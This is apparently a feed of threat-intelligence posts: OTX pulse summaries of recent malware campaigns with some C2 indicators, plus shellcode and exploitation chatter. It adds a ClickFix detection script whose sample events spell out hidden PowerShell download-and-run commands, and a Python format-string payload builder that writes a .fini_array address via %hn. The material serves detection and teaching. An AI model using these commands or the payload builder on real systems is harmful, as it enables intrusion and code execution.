Middle East Conflict Fuels Opportunistic Cyber Attacks

The ongoing conflict in the Middle East has triggered a surge in cybercriminal activity. Over 8,000 newly registered domains with conflict-related keywords have been identified, many of which may be weaponized in future campaigns. Multiple cases of malicious activity have been observed, including targeted attacks using conflict-themed lures, deployment of the LOTUSLITE backdoor, fake news blogs leading to StealC malware, phishing sites impersonating government portals, donation scams, fraudulent storefronts, and meme-coin pump-and-dump schemes. Threat actors are leveraging various techniques such as DLL sideloading, shellcode execution, and social engineering to compromise victims. The campaigns demonstrate the opportunistic nature of cybercriminals in exploiting geopolitical events for malicious purposes.

Pulse ID: 69ab2d63ef698ae16cec5ef2
Pulse Link: https://otx.alienvault.com/pulse/69ab2d63ef698ae16cec5ef2
Pulse Author: AlienVault
Created: 2026-03-06 19:39:15

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberAttack #CyberAttacks #CyberSecurity #Government #InfoSec #Malware #MiddleEast #OTX #OpenThreatExchange #Phishing #RAT #ShellCode #SideLoading #SocialEngineering #Stealc #StealcMalware #Word #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

If the Kardashians launched their own framework it would be Kommand and Kontrol (K2).

The Momager (Kris.exe or Kris.sh): The primary C2 listener.
The Glow Up: Privesc
Keeping Up: Lateral movement

#C2Framework #RedTeaming #PostExploitation #MalwareDevelopment #Infosec #CyberSecurity #EDRBypass #ActiveDirectory #PenTesting #ThreatHunting #MITREATTACK #APTHunting #Shellcode #ZeroDay #Persistence #Exfiltration #BlueTeam #PurpleTeaming #kardashians

SloppyLemming Deploys BurrowShell and Rust-Based RAT to Target Pakistan and Bangladesh

An extensive cyber espionage campaign conducted by SloppyLemming, an India-nexus threat actor, targeted government entities and critical infrastructure in Pakistan and Bangladesh from January 2025 to January 2026. The campaign used two attack vectors: PDF lures with ClickOnce execution chains and macro-enabled Excel documents. It deployed a custom x64 shellcode implant named BurrowShell and a Rust-based keylogger. The attackers extensively abused Cloudflare Workers for C2 and payload delivery, registering 112 domains impersonating government entities. The campaign focused on nuclear, defense, telecommunications, energy, and financial sectors, aligning with regional strategic competition in South Asia.

Pulse ID: 69a6c1d2775c55bd8367e527
Pulse Link: https://otx.alienvault.com/pulse/69a6c1d2775c55bd8367e527
Pulse Author: AlienVault
Created: 2026-03-03 11:11:14

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Asia #Bangladesh #Cloud #CyberSecurity #Espionage #Excel #Government #India #InfoSec #KeyLogger #Mac #OTX #OpenThreatExchange #PDF #Pakistan #RAT #Rust #ShellCode #SouthAsia #Telecom #Telecommunication #bot #AlienVault

APT37 Adds New Capabilities for Air-Gapped Networks

APT37, a DPRK-backed threat group, has launched a new campaign called Ruby Jumper, utilizing Windows shortcut files to initiate attacks with newly discovered tools. These tools include RESTLEAF, SNAKEDROPPER, THUMBSBD, and VIRUSTASK, which work together to deliver surveillance payloads like FOOTWINE and BLUELIGHT. The campaign leverages removable media to infect and communicate with air-gapped systems. Key features include the use of Ruby for shellcode-based payloads, abuse of cloud storage services for command and control, and sophisticated techniques for bypassing network isolation. The malware demonstrates advanced capabilities in system reconnaissance, data exfiltration, and persistent surveillance.

Pulse ID: 69a06896d797f45ad8da76b0
Pulse Link: https://otx.alienvault.com/pulse/69a06896d797f45ad8da76b0
Pulse Author: AlienVault
Created: 2026-02-26 15:36:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#APT37 #Cloud #CyberSecurity #DPRK #EDR #InfoSec #Malware #OTX #OpenThreatExchange #RAT #Rust #ShellCode #Windows #bot #AlienVault

The Latest PlugX Variant Executed by STATICPLUGIN

In January 2026, a new variant of the PlugX malware was observed being used in targeted attacks. Analysis suggests involvement of the UNC6384 APT group, linked to Mustang Panda, targeting government agencies in Southeast Asia. The malware uses a browser updater disguise to download and execute a malicious MSI file, leading to PlugX infection. The STATICPLUGIN downloader uses a revoked code-signing certificate from a Chinese company. The PlugX variant employs DLL sideloading and shellcode execution techniques. Its configuration is encrypted using RC4 and custom encoding. C2 servers were identified as fruitbrat[.]com and 108.165.255[.]97:443. The ongoing improvements to PlugX indicate its continued use in targeted attacks by APT groups.

Pulse ID: 699edea96aa1a8d035261fc9
Pulse Link: https://otx.alienvault.com/pulse/699edea96aa1a8d035261fc9
Pulse Author: AlienVault
Created: 2026-02-25 11:36:09

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Asia #Browser #Chinese #CyberSecurity #Government #InfoSec #Malware #OTX #OpenThreatExchange #PlugX #RAT #ShellCode #SideLoading #bot #AlienVault

MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites

A sophisticated ClickFix campaign has been uncovered, compromising legitimate websites to deliver a multi-stage malware chain. The attack culminates in MIMICRAT, a custom remote access trojan with advanced capabilities. The campaign uses compromised sites across industries and geographies for delivery, employing a five-stage PowerShell chain that bypasses security measures before deploying a Lua-scripted shellcode loader. MIMICRAT, the final payload, is a native C++ RAT featuring malleable C2 profiles, Windows token theft, and SOCKS5 proxy functionality. The attack chain involves multiple compromised websites, obfuscated scripts, and sophisticated evasion techniques, demonstrating a high level of operational sophistication.

Pulse ID: 699874fdcc7eaabe6bb130ac
Pulse Link: https://otx.alienvault.com/pulse/699874fdcc7eaabe6bb130ac
Pulse Author: AlienVault
Created: 2026-02-20 14:51:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #LUA #Malware #Mimic #OTX #OpenThreatExchange #PowerShell #Proxy #RAT #RemoteAccessTrojan #ShellCode #Trojan #Windows #bot #socks5 #AlienVault

How ClickFix Opens the Door to Stealthy StealC Information Stealer

This analysis examines a sophisticated attack chain targeting Windows systems through social engineering. It uses fake CAPTCHA verification pages to trick users into executing malicious PowerShell commands. The multi-stage infection process ultimately deploys the StealC information stealer, a commodity malware designed to harvest sensitive data. The attack chain includes PowerShell scripts, position-independent shellcode, and a PE downloader, utilizing techniques like reflective PE loading, API hashing, and process injection to evade detection. StealC's capabilities include stealing browser credentials, cryptocurrency wallets, Steam accounts, Outlook credentials, and system information. The malware uses encrypted C2 communication and operates without persistence, making it particularly stealthy.

Pulse ID: 6994ac3199278b0524647f4c
Pulse Link: https://otx.alienvault.com/pulse/6994ac3199278b0524647f4c
Pulse Author: AlienVault
Created: 2026-02-17 17:58:09

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CAPTCHA #CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #Outlook #PowerShell #RAT #ShellCode #SocialEngineering #Stealc #Steam #Windows #bot #cryptocurrency #AlienVault
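
Both ClickFix write-ups above (the MIMICRAT campaign and the StealC chain) begin the same way: the victim is talked into pasting a command into the Run dialog or a console, and an interactive process such as explorer.exe ends up spawning a hidden PowerShell that downloads and runs the next stage. The following is an added example, not code from either report or from LevelBlue, that triages process-creation events for that pattern. The events are constructed in the shape of Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the hostnames in them are placeholders, and the indicator list is a starting point rather than the campaigns' exact command lines.

```python
import base64
import re


def _encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes the base64 of the script as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# Hostnames are placeholders; none of this is data from the campaigns above.
SAMPLE_EVENTS = [
    {   # Run-dialog paste: explorer.exe spawns a hidden PowerShell that fetches and runs a script
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -w hidden -nop -c "iex (irm https://captcha.example.invalid/verify)"',
    },
    {   # Same idea, with the script hidden behind -EncodedCommand
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -enc " + _encode_ps(
            "$s=(New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/a.txt');iex $s"),
    },
    {   # Benign: an editor running a build script in a visible window
        "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -NoProfile -ExecutionPolicy Bypass -File .\build.ps1",
    },
]

INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
B64_RUN = r"[A-Za-z0-9+/=]{16,}"
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+(" + B64_RUN + ")", re.I)

# (name, regex) pairs, matched case-insensitively against the command line and,
# when one is present, the decoded -EncodedCommand body appended to it.
INDICATORS = [
    ("hidden window",     r"-w(?:indowstyle)?\s+h(?:idden)?\b"),
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("web download",      r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile"),
    ("base64 decode",     r"frombase64string"),
    ("encoded command",   ENC_RE.pattern),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict):
    """Return (score, reasons): one point per matched indicator, shells only."""
    reasons = []
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    if child not in SHELLS:
        return 0, reasons
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"{child} spawned by {parent}")
    text = ev["CommandLine"]
    decoded = decode_encoded_command(text)
    if decoded:
        text += "\n" + decoded          # match on what will actually execute
    for name, pattern in INDICATORS:
        if re.search(pattern, text, re.I):
            reasons.append(name)
    return len(reasons), reasons


def triage(events, threshold: int = 3):
    """Return [(index, score, reasons)] for events scoring at or above threshold."""
    flagged = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((i, score, reasons))
    return flagged


if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}: {', '.join(reasons)}")
```

Decoding -EncodedCommand before matching is the part that matters: the base64 body hides strings such as iex and DownloadString from anything that only looks at the raw command line. The parent-process check is what separates a pasted command from a scheduled or scripted one, so the parent list and the threshold are the knobs to tune against your own baseline.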

This multi-part blog series is discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

In part 4 we cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set.

Learn more at https://cirosec.de/en/news/windows-instrumentation-callbacks-part-4/

#Blog #Windows #Shellcode #RedTeaming #ReverseEngineering

Dumb Question: what is the license of the shellcode in ShellStorm's Shellcodes Database? I cannot find any mention of a license on the website. People have started creating their own git repos to mirror the website's contents, also without any mention of a license or copyright. I feel like this is a big copyright/licensing legal problem waiting to happen.

Also, what if you only copy/paste in the hex bytes from the assembled shellcode into another project? What if you add comments with the assembly source code next to each line of hex bytes? Is that considered "derived work"?

/cc @JonathanSalwan

#shellcode #shellstorm

Shellcodes database for study cases

🌘 Implementing a web server in a single printf() call
➤ From urban legend to hardcore implementation: exploring the extreme art of format strings
https://tinyhack.com/2014/03/12/implementing-a-web-server-in-a-single-printf-call/
In programming circles there is a joke about the legendary Google engineer Jeff Dean: he once wrote a web server in a single `printf()` call. Although it is only a humorous anecdote, the author of this article decided to take on the challenge of making it real. By ingeniously exploiting the properties of C's `printf` format strings, the author overwrites the termination-function array (.fini_array) of a Linux executable, redirecting control flow to machine code embedded in the string. That machine code holds all the logic to create a socket, listen on a port and return an HTTP response. It is not only a virtuoso piece of programming, it also explains the underlying mechanics of format string attacks in an accessible way.
+ This really is modern alchemy! I always thought format string vulnerabilities only
#C #FormatStringVulnerability #SystemExploitation #Shellcode #LinuxSystemsProgramming
Implementing a web server in a single printf() call

A guy just forwarded a joke that most of us will already know Jeff Dean Facts (also here and here). Every time I read that list, this part stands out: Jeff Dean once implemented a web server in a single printf() call. Other engineers added thousands of lines of explanatory comments but still don't u

Tinyhack.com
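
The write primitive behind the post above is printf's %n family: %hn stores the number of bytes printed so far into the 16-bit location named by a pointer argument, so controlling the width of earlier conversions controls the stored value, and four such writes put an arbitrary 8-byte address into a .fini_array slot. The block below is an added example, not code from the tinyhack article, that builds such a payload for a generic x86-64 layout and checks it against a small model of printf. The addresses (0x404060 for the .fini_array slot, 0x401136 for the code to jump to) and the argument offset 6 are hypothetical; the article's own string is laid out differently, with the machine code embedded in the same string.

```python
import re
import struct

MASK16 = 0xFFFF
# The only conversions the checker models: positional %N$<width>c and %N$hn.
DIRECTIVE = re.compile(rb"%(\d+)\$(\d*)(c|hn)")


def build_fmt_payload(target_addr: int, value: int, arg_offset: int) -> bytes:
    """Format string that stores the 8-byte `value` at `target_addr` with four
    2-byte %hn writes (x86-64, little-endian).

    arg_offset is the positional printf argument number at which the buffer
    holding this string sits on the stack (6 if it is the first stack-passed
    argument after the register arguments rsi..r9). The %hn pointers are
    appended after the directives: their zero high bytes would otherwise
    terminate the format string before any write happened."""
    chunks = [(value >> (16 * i)) & MASK16 for i in range(4)]
    order = sorted(range(4), key=lambda i: chunks[i])   # ascending: the count only grows
    ptr_qwords = 0   # 8-byte slots the directives occupy; pointer indices depend on it
    while True:
        first_ptr = arg_offset + ptr_qwords
        fmt, count = b"", 0
        for k, i in enumerate(order):
            pad = (chunks[i] - count) & MASK16
            if pad:                                 # %1$<pad>c prints exactly pad bytes
                fmt += f"%1${pad}c".encode()
                count += pad
            fmt += f"%{first_ptr + k}$hn".encode()  # pointer k holds target_addr + 2*i
        needed = (len(fmt) + 7) // 8
        if needed <= ptr_qwords:
            break
        ptr_qwords = needed                         # longer indices may need a slot more; retry
    fmt = fmt.ljust(ptr_qwords * 8, b"A")
    for i in order:
        fmt += struct.pack("<Q", target_addr + 2 * i)
    return fmt


def simulate_printf(payload: bytes, arg_offset: int, mem: dict) -> int:
    """Model just enough of printf to check the payload. Positional arguments
    at or above arg_offset are read from the payload itself, as if the buffer
    sat on the stack at that slot; lower ones are treated as junk (0).
    Raises on any directive it does not model instead of miscounting."""
    def arg(n: int) -> int:
        slot = n - arg_offset
        if slot < 0:
            return 0
        return struct.unpack("<Q", payload[slot * 8:slot * 8 + 8].ljust(8, b"\0"))[0]

    fmt = payload.split(b"\0", 1)[0]          # printf stops at the first NUL
    count = pos = 0
    while pos < len(fmt):
        m = DIRECTIVE.match(fmt, pos)
        if m:
            n, width, conv = int(m.group(1)), m.group(2), m.group(3)
            if conv == b"c":
                count += max(int(width or b"1"), 1)
            else:                                 # %hn: store the low 16 bits of count
                addr = arg(n)
                mem[addr], mem[addr + 1] = count & 0xFF, (count >> 8) & 0xFF
            pos = m.end()
        elif fmt[pos:pos + 1] == b"%":
            raise ValueError("directive not modelled at offset %d" % pos)
        else:
            count += 1                            # literal byte, printed as-is
            pos += 1
    return count


def read_qword(mem: dict, addr: int) -> int:
    return int.from_bytes(bytes(mem.get(addr + i, 0) for i in range(8)), "little")


def demo():
    target = 0x404060   # hypothetical .fini_array slot
    value = 0x401136    # hypothetical address of the code to run at exit
    payload = build_fmt_payload(target, value, arg_offset=6)
    mem = {}
    simulate_printf(payload, 6, mem)
    return payload, read_qword(mem, target)


if __name__ == "__main__":
    payload, stored = demo()
    print(payload.split(b"\0", 1)[0], hex(stored))
```

Two details are easy to get wrong when carrying this to a real target: the pointers go after the directives because their high zero bytes end the format string, and a 0x25 ('%') byte inside a pointer would itself be parsed as a directive, which the model flags by raising rather than guessing. The ascending write order keeps every padding width small; without it each wrap-around costs up to 65535 extra printed bytes.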